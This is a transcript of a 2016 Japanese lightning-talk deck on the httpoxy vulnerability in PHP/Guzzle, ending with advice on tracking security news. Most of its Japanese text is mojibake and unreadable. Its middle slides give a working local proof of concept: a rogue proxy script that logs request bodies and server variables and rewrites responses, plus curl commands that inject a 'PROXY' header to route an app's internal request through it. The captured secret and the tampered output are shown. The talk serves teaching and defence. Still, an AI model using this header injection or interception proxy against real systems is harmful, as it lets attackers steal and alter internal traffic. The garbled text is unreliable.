$30 off During Our Annual Pro Sale. View Details »

初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5

uzulla
July 20, 2016

初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5

PHPBLT #5でほぼしゃべらなかったLTの資料です。

uzulla

July 20, 2016
Tweet

More Decks by uzulla

Other Decks in Technology

Transcript

 1. PHPBLT#5
  Httpoxyͱ͔ͷ࿩
  20160720
  uzulla

  View Slide

 2. ࣗݾ঺հ
  • Junichi Ishida aka uzulla
  • ͠ΐ΅͍ϑϦʔλʔʢϥϯεʣͰ͢
  • HachiojiͳΜͨΒͱ͔
  • ͳΜͨΒHacjioji in ඼઒ͱ͔

  View Slide

 3. Httpoxy
  • https:/
  /httpoxy.org/
  • ࡉ޻ͨ͠ϦΫΤετΛૹΔ͜ͱͰɺPHP͔Β֎෦΁ͷϦΫΤε
  τʹ͓͍ͯhttpϓϩΩγΛࢦఆͰ͖ΔՄೳੑ
  • ΞϓϦ͔Βଞͷαʔόʔ΁ͷhttp௨৴Λ౪ௌͰ͖ΔՄೳੑ
  • ͋Δ͍͸ɺվ͟Μ΋Ͱ͖ΔՄೳੑ
  • ΈΜͳௐࠪࡁΈͩΑͶʂʁ
  • ʢΈΜͳ஌͍ͬͯͨΒ਺ϖʔδඈ͹͢ʣ

  View Slide

 4. View Slide

 5. • ʮCLIͰΑ͋͘Δ࢓༷ʯͱʮCGIͷ࢓༷ʯͷিಥ͕ݪҼ
  • HTTP_PROXY؀ڥม਺ͰϓϩΩγΛઃఆͰ͖ΔCLIͷϓϩάϥϜ
  ͕Α͋͘Δ
  • ΢ΣϒΞϓϦʹ͸ʢ΄΅ʣແ༻͕ͩɺී௨ͷਓʢʁʣ͸PHPͰ
  CLIϓϩάϥϜΛॻ͘ͷͰɺҰ෦ͷϥΠϒϥϦ͕αϙʔτͨ͠ɻ
  • ͯ͞ɺCGIͷ࢓༷Ͱ͸ʢྫ͑͹ʣHOGEͱ͍͏ϦΫΤετϔομ
  ʔΛHTTP_HOGE؀ڥม਺ʹอଘ͢Δͷ͕ͩ…ɻ
  • ݁ՌɺʮPROXYʯϔομ͕དྷΔͱHTTP_PROXYͱ͍͏؀ڥม਺͕
  ઃఆ͞ΕɺϦΫΤετϔομ͔ΒϓϩΩγ͕ઃఆͰ͖Δʢʂʣ

  View Slide

 6. • CGIϦεϖΫτͳPHP͸mod_php΍fastcgi΋͜ͷ࢓༷
  • ͳ͓ɺPHPࣗମ͸௚઀͜ͷ੬ऑੑ͸Өڹ͠ͳ͍
  • օେ޷͖file_get_contents͸Өڹͳ͍
  • ͕Μ͹ͬͯ࡞Γ͜·ͳ͚Ε͹Өڹ͠ͳ͍ʼ͡Ό͋ͳΜͰʁ
  • HTTP_PROXYΛड͚ೖΕΔ୅දతͳϥΠϒϥϦͱͯ͠guzzle
  • 6.2.1Ͱमਖ਼
  • guzzle͸࠷ۙ͋ΒΏΔॴͰґଘϥΠϒϥϦͱͯ͠࢖ΘΕ͍ͯ
  ΔɺͳͷͰ࿩୊ʹͳͬͨͷͰͨ͠ʂ

  View Slide

 7. ͳ͓…
  • ઃఆͰ͖Δͷ͸HTTP_PROXY؀ڥม਺Ͱ͋ͬͯɺHTTPS_PROXY؀
  ڥม਺͸ࢦఆͰ͖ͳ͍
  • τϦοΫ্ɺHTTP_*͔͠ઃఆͰ͖ͳ͍ͷͰ
  • ͭ·Γɺ৐ͬऔΕΔͷ͸HTTP
  • ʢৗࣝతͳϥΠϒϥϦͳΒͶʂʣ
  • େ఍ͷϠόΠ৘ใ͸HTTPSͩΖ͏…ଟ෼…ɻ

  View Slide

 8. ΦνͱͳΔରࡦ͸
  • !΢Σϒαʔό౳ͰɺPHPͷࣄલʹϔομʔΛམͱ͢
  • !getenv('HTTP_PROXY')ͳͲͱ͍ͬͨίʔυΛແ͘͢
  • ίʔυΛ௚͢
  • ϥΠϒϥϦͷόʔδϣϯΞοϓ
  • ❌ʮίʔυઌ಄ͱ͔Ͱ؀ڥม਺্ॻ͖͢Ε͹͍͍ͷͰ͸ʁʯ
  ʮ࢒೦ͳΒແཧͳͷͰ͢ʯ

  View Slide

 9. ͜͜·Ͱ͸օ͞Μ͝ଘ͡
  • ʢ͖ͬͱ͜͜·Ͱશ෦ͷεϥΠυ͕εΩοϓʣ
  • ͱ͜ΖͰΈͳ͞Μɺීஈ͔Β੬ऑੑͷରԠͯ͠·͔͢ʁ
  • ʮࣗ෼Ͱʯௐࠪ΍ରԠͯ͠·͔͢ʁ
  • ʮࣗ෼Ͱʯීஈ͔Β৘ใऩूͯ͠·͔͢ʁ
  • ʢͳ͓ϑϦʔλʔ͸ݽಠͳͷͰ౰વηϧϑαʔϏε…ʣ

  View Slide

 10. ࢼͯ͠·͔͢ʁ
  • ࢼ͞ͳ͍ͰɺରԠࡦΛͱʹ͔͘ίϐϖͨ͠Γͯ͠·ͤΜ͔ʁ
  • ੬ऑੑ͸ࢼ͞ͳ͍ͱצҧ͍͢Δࣄ͕͋Δ
  • ௨ৗࣗ෼Ͱ࣮૷͢Δඞཁ͕͋Δ͕ɺPoC͕ެ։͞Ε͍ͯΔ͜ͱ
  ΋ଟ͍
  • Proof of conceptʢ֓೦࣮ূɺ࣮ূσϞʣ
  • ੬ऑੑΛ࠶ݱͤ͞ΔσϞίʔυ
  • ʢ࠷ۙࢮޠɿexploit codeʣ

  View Slide

 11. ࢼͦ͏ʂ
  • ࢼ͍ͯ͠Δਓ͕ଟ͔ͬͨΒεΩοϓʂ

  View Slide

 12. • PoC͸Ͳ͜ʹ͋Δ͔ʁ
  • CVE౳ʹඞͣهࡌ͞Ε͍ͯΔΘ͚Ͱ͸ͳ͍ɺͷͰ୳͢
  • ʮ࣏͕҆ѱ͘ͳΔ͔Βެ։͢Δͳʂʯͱ͍͏ਓ΋͍ΔͷͰ…
  • ͳ͓ɺΑ͘Θ͔ΒΜPoCʢ΍Exploitʣ͸ઈରʹ࣮ߦ͢Δͳʂʂʂ
  • CVEͱ͔ʹ৐ͬͯΔౕ͸େৎ෉ͩΖ͏͕ɺ໺ྑͷExploit͸ഁ
  յతͩͬͨΓɺόοΫυΞͩͬͨΓ͢Δ
  • ࠓճ͸httpoxy͕ެ։͍ͯͨ͠
  • https:/
  /github.com/httpoxy/php-fpm-httpoxy-poc

  View Slide

 13. // ݩͷίʔυ͸͜ͷΑ͏ͳײ͡
  // "guzzlehttp/guzzle": "~6.0"
  $client = new GuzzleHttp\Client();
  $client->request(
  'POST',
  'http://my-internal-microservice.example.com/',
  ['secret' => 'some-really-secret-string']
  );
  echo "Request sent\n";

  View Slide

 14. // ͦͷ··Ͱ͸࢖͑ͳ͍ͷͰɺίʔυमਖ਼
  // http://127.0.0.1:8002/api.phpʹػີσʔλ()ΛPOSTͯ͠ɺ
  // ؼ͖ͬͯͨσʔλΛecho͍ͯ͠Δ
  require 'vendor/autoload.php';
  $client = new GuzzleHttp\Client();
  $res = $client->request(
  'POST',
  'http://127.0.0.1:8002/api.php?himi=tsu',
  ['form_params' => ['secret' => 'I_AM_PHPER']]
  );
  echo $res->getBody();

  View Slide

 15. API(?!)Λ࡞੒
  // api.php
  echo "BLT!BLT!";

  View Slide

 16. ΞϓϦͱAPI(?!)Λىಈ
  $ composer install
  $ php -S 127.0.0.1:8001 index.php
  # ผγΣϧͰ
  $ php -S 127.0.0.1:8002 api.php

  View Slide

 17. ͨΊͯ͠ΈΔ
  $ curl 'http://localhost:8001/'
  BLT!BLT!
  • API͔ΒͷσʔλΛͱ͖ͬͯͯΔͷͰOK

  View Slide

 18. ѱҙ͋ΔProxyΛ༻ҙ͢Δ
  • ͝ՈఉʹProxy͕͋Δํ͸ෆཁ
  • Charlesͱ͔
  • (༨ஊɿcharlesݹ͍͠ɺ࠷ۙ͸ͳʹ͕ϋϠϦͳͷʁ)

  View Slide

 19. ѱҙ()͋ΔࡶͳproxyΛॻ͘
  $uri = $_SERVER['REQUEST_URI'];
  $body = file_get_contents('php://input');
  $method = $_SERVER['REQUEST_METHOD'];
  error_log($body);
  error_log(print_r($_SERVER,1));
  require 'vendor/autoload.php';
  $client = new GuzzleHttp\Client();
  $res = $client->request($method, $uri, ['body' => $body]);
  echo $res->getBody();

  View Slide

 20. ࡶͳProxyʹ͍ͭͯ
  • ੒ޭ͢ΔͱɺΫΤϦͳͲΛerror_logʹग़ྗ͢Δ
  • ద౰ʹproxyઌ͔Βऔಘ͖ͯͯ͠Ϩεϙϯε͢Δ
  ʢproxy͔ͩΒͶ…ʣ
  • ͜ͷίʔυ͸ࡶͰةݥͳͷͰ࣮ݧҎ֎ʹ͸ઈରʹ࢖͏ͳΑʂ
  • ʮContent-type?ͳʹͦΕ͏·͍ͷʁʯ

  View Slide

 21. ࡶͳproxy্ཱͪ͛
  $ php -S 127.0.0.1:8003 proxy.php

  View Slide

 22. ࣮ࡍʹ੬ऑੑΛςετͩʂ
  $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/'
  BLT!BLT!

  View Slide

 23. • ʮ࢒೦͜ΕͰ͸͏͖͝·ͤΜʯ
  • ͳΜͱbuiltin server ͸੬ऑੑ͕ͳ͍ʂ͆
  • ͱ͍͏͜ͱͰɺ੿࡞apachehereΛ͔ͭ͏(໪࿦ͳΜͰ΋͍͍͚Ͳ)
  • https:/
  /github.com/uzulla/apachehere
  $ apachehere -p 8001
  DocumentRoot : /xxx
  php-cgi
  open : http://127.0.0.1:8001/

  [20/Jul/2016:01:49:18 +0900] 127.0.0.1 [200]: /index.php

  View Slide

 24. ϦτϥΠʂ
  $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/'
  BLT!BLT!

  View Slide

 25. ੒ޭ͢Δͱproxyͷϩάʹ…
  [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER
  [Wed Jul 20 02:01:43 2016] Array
  (
  [DOCUMENT_ROOT] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc
  [REMOTE_ADDR] => 127.0.0.1
  [REMOTE_PORT] => 53696
  [SERVER_SOFTWARE] => PHP 7.0.3 Development Server
  [SERVER_PROTOCOL] => HTTP/1.1
  [SERVER_NAME] => 127.0.0.1
  [SERVER_PORT] => 8003
  [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu
  [REQUEST_METHOD] => POST
  [SCRIPT_NAME] => /api.php
  [SCRIPT_FILENAME] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc/api.php
  [PHP_SELF] => /api.php
  [QUERY_STRING] => himi=tsu
  [HTTP_HOST] => 127.0.0.1:8002
  [HTTP_PROXY_CONNECTION] => Keep-Alive
  [HTTP_USER_AGENT] => GuzzleHttp/6.2.0 curl/7.43.0 PHP/7.0.3
  [CONTENT_TYPE] => application/x-www-form-urlencoded
  [HTTP_CONTENT_TYPE] => application/x-www-form-urlencoded
  [CONTENT_LENGTH] => 17
  [HTTP_CONTENT_LENGTH] => 17
  [REQUEST_TIME_FLOAT] => 1468947703.6871
  [REQUEST_TIME] => 1468947703
  )

  View Slide

 26. [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER
  [Wed Jul 20 02:01:43 2016] Array
  (
  snip
  [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu
  • ͜ͷΑ͏ʹɺproxy.phpͷϩάʹͰͯ͘ΔΘ͚Ͱ͢Ͷɻ

  View Slide

 27. proxyΛमਖ਼͢Ε͹…
  // proxy.php
  //echo $res->getBody();
  echo "ീԦࢠʂീԦࢠʂ";
  • ͱमਖ਼ͯ͠
  $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/'
  ീԦࢠʂീԦࢠʂ
  • վ͟Μ੒ޭͰ͢Ͷʂ

  View Slide

 28. ͱ͍͏͜ͱͰɺ
  • ҆શͷͨΊʹbuiltin serverΛ͔͓ͭ͏ʢҧ͏ʣ
  • ͱʹ͔͘PoCΛಈ͔ͨ͠Γ࡞ͬͯΈΔͷ͸ॏཁɺษڧʹͳΔ
  • ʮapachehere͕ศརμφʔɺDockerʁVagrantʁ͠ΒΜʂʯ
  • ʮ͑ͬɺPHPͷόʔδϣϯ͕ݹ͍ʁ͢·Μʂʯ

  View Slide

 29. ͋ͱɺ৻ॏʹͶʂ
  • ύονόʔδϣϯΛ؁͘Έͯ͸͍͚ͳ͍
  • ʮGuzzleͷ্͛ͨΒɺGAEͰ͏͔͝ͳ͘ͳͬͨʢ࣮࿩ʯ
  exception:
  php_sapi_name() has been disabled for security reasons.
  It can be re-enabled by adding it to
  the google_app_engine.enable_functions ini variable
  in your applications php.ini
  • ʮGAE ͕ѱ͍ ͷ࢓༷Ͱ͸ʁʯʮ͔ͨ͠ʹʯ

  View Slide

 30. Ͱ͸υίͰ஌Δ͔ʁ
  • օ͞Μ͸Ͳ͜Ͱ஌ͬͯ·͔͢ʁ

  View Slide

 31. ໰୊Λ΢Υον͠ଓ͚Δ
  • ໘౗͕ͩ࢓ࣄͩʂ
  • TwitterͳͲSNSͰ஌Δ
  • CVEͳͲΛߪಡ͢Δ
  • χϡʔεαΠτΛߪಡ͢Δ
  • ެࣜϦϦʔεΛߪಡ͢Δ

  View Slide

 32. TwitterͳͲSNS
  • ଎ใੑ͕ߴ͍ɺ5ׂ͘Β͍͸͜͜ͰଘࡏΛ஌ΔࣄʹͳΔ
  • ʢPHPͷਓͰ͸ͳ͆͘ʣJSɺGoɺPerl΍Πϯϑϥํ໘ͳͲͷਓΛ
  ϑΥϩʔ͢Δͱྑ͍ʢݸਓతͳओ؍ʣ
  • ৄ͍͠ਓ͸౰વ࿩୊ʹ͢Δ͜ͱ͕ଟ͍͠ɺ
  ʢΘ͔͍ͬͯΔͷͰʣҰ࣍৘ใʹϦϯΫ͍ͯ͠Δ͜ͱ͕ଟ͍

  View Slide

 33. ηΩϡϦςΟʹಛԽͨ͠χϡʔεαΠτ
  • http:/
  /jvn.jp/report/
  • JVNɺ೔ຊޠɺ·ͣ͸͚ͩ͜͜Ͱ΋ྑ͍ʢͱࢥ͏ʣ
  • Feed΋͋ΔΑ
  • https:/
  /www.jpcert.or.jp/
  • JPCERTɺϝϧϚΨ΋͋ΔΑʂ

  View Slide

 34. • https:/
  /nvd.nist.gov/download.cfm
  • NISTɺӳޠɺCVEͷFeed͕͋ΔͷͰศར
  • CVE͸΄΅Ұ࣍৘ใͱͯ͠ѻͬͯྑ͍ʢͱࢥ͏ʣ
  • https:/
  /security.sensiolabs.org/database
  • PHPϥΠϒϥϦͷ৘ใɺFeed͕͋ΔͷͰศར

  View Slide

 35. ҰൠతͳχϡʔεαΠτ౳
  • ҰൠతͳITܥχϡʔεαΠτ͸…ຊจ͸ಡ·ͣʹ͙͢ʹϦϯΫઌ
  ͷҰ࣍৘ใ΁ݴͬͨํ͕ྑ͍…ɻ

  View Slide

 36. • reddit֤छɺ଎ใੑߴ͍͕ίϝϯτ͸͙͢ʹ৴༻͠ͳ͍Α͏ʹ
  • https:/
  /www.reddit.com/r/netsec
  • https:/
  /www.reddit.com/r/sysadmin
  • https:/
  /www.reddit.com/r/PHP
  • hackernewsɺ଎͍Μ͚ͩͲ͙͢ʹྲྀΕ͍ͯ͘
  • https:/
  /news.ycombinator.com/news

  View Slide

 37. ެࣜαΠτ
  • ಛʹࡉ͔͔͔͘ͳ͍Ͱ͚͢Ͳ
  • ࣗ෼͕͔͍ͭͬͯΔϑϨʔϜϫʔΫ΍ϥΠϒϥϦ΍PHPͷϦϦ
  ʔεͱ͔͸Έͯ΋ྑ͍ͷͰ͸ʁʁ

  View Slide

 38. blog
  • ࣄྫΛ·ͱΊͯΒͬ͠ΌΔαΠτͱ͔
  • ηΩϡϦςΟاۀͷϒϩά΋Α͍
  • ౰વ͚ͩͲɺ໢ཏੑ͕ͳ͍
  • ʮ୯ޠʯΛ஌ͬͯɺ୳͔ͯ͠ΒͨͲΓண͘ͷͰ΋Α͍
  • झຯ͕ͰΔͷͰলུ

  View Slide

 39. Branded Vulnerability ͳαΠτ
  • ࠷ۙ͸Ωϟονʔͳ໊લ͕෇͘ɺHttpoxy΋ͦ͏
  • GHOST,FREAK,POODLE౳ʑ
  • ·ͱΊαΠτΈ͍ͨͳ΋ͷɺγΣΞ͠΍͘͢ΩϟονʔͳΞΠ
  ίϯ͕͋ͬͨΓͯ͠Α͍
  • ଟ͘ͷ৔߹CVEΑΓ͸Θ͔Γ΍͍͢͠ɺͱΓ͔͋͑ͣ͜͜ΒΑΜ
  Ͱ΋OK͕ͩɺӳޠͰ͢ɻ
  • ʮ͜Ε͕͋Δ͔Βॏେʂʯͱ͍͏༁Ͱ͸ͳ͍ɺٯ΋·͔ͨ͠Γ

  View Slide

 40. ৘ใΩϟον·ͱΊ
  • ΢Υονʹ͸RSSͱϝϧϚΨ͕ศརʂSNS͚ͩͩͱ࿙ΕΔʂʢओ
  ؍Ͱ͕͢ɺΈΜͳ͕PHPͷ͜ͱΛؾʹͯ͠ΔΘ͚Ͱ͸ͳ͍͆ʣ
  • JPCERTͱJVN͘Β͍͸ొ࿥ͯ͠Α͍ͷͰ͸
  • Branded VulnerabilityͳαΠτ͕͋Ε͹·ͣνΣοΫ
  • ӳޠ͕ॏཁʢʣ
  • ࿨༁΍ղઆهࣄ͸Ұ൩ೋ൩͘Β͍ͰདྷΔͷͰɺΑ͘Θ͔Βͳ͚
  Ε͹߄ͯͣʹਖ਼࠲ͯ͠଴ͭ͜ͱ

  View Slide

 41. That's all folks!
  • ੬ऑੑ͸ࣗ෼Ͱ΋ͨΊͦ͏ʂ
  • χϡʔεΛͪΌΜͱݟΑ͏ʂ
  • ͪΌΜͱ੬ऑੑΛ೺Ѳͯ͜͠ʂ
  • Httpoxyɺ͋Μ·Γ೿खͳ੬ऑੑ͡Όͳͯ͘Α͔ͬͨʂ
  // enjoy !
  $ grep -r HTTP_PROXY /your/codes/

  View Slide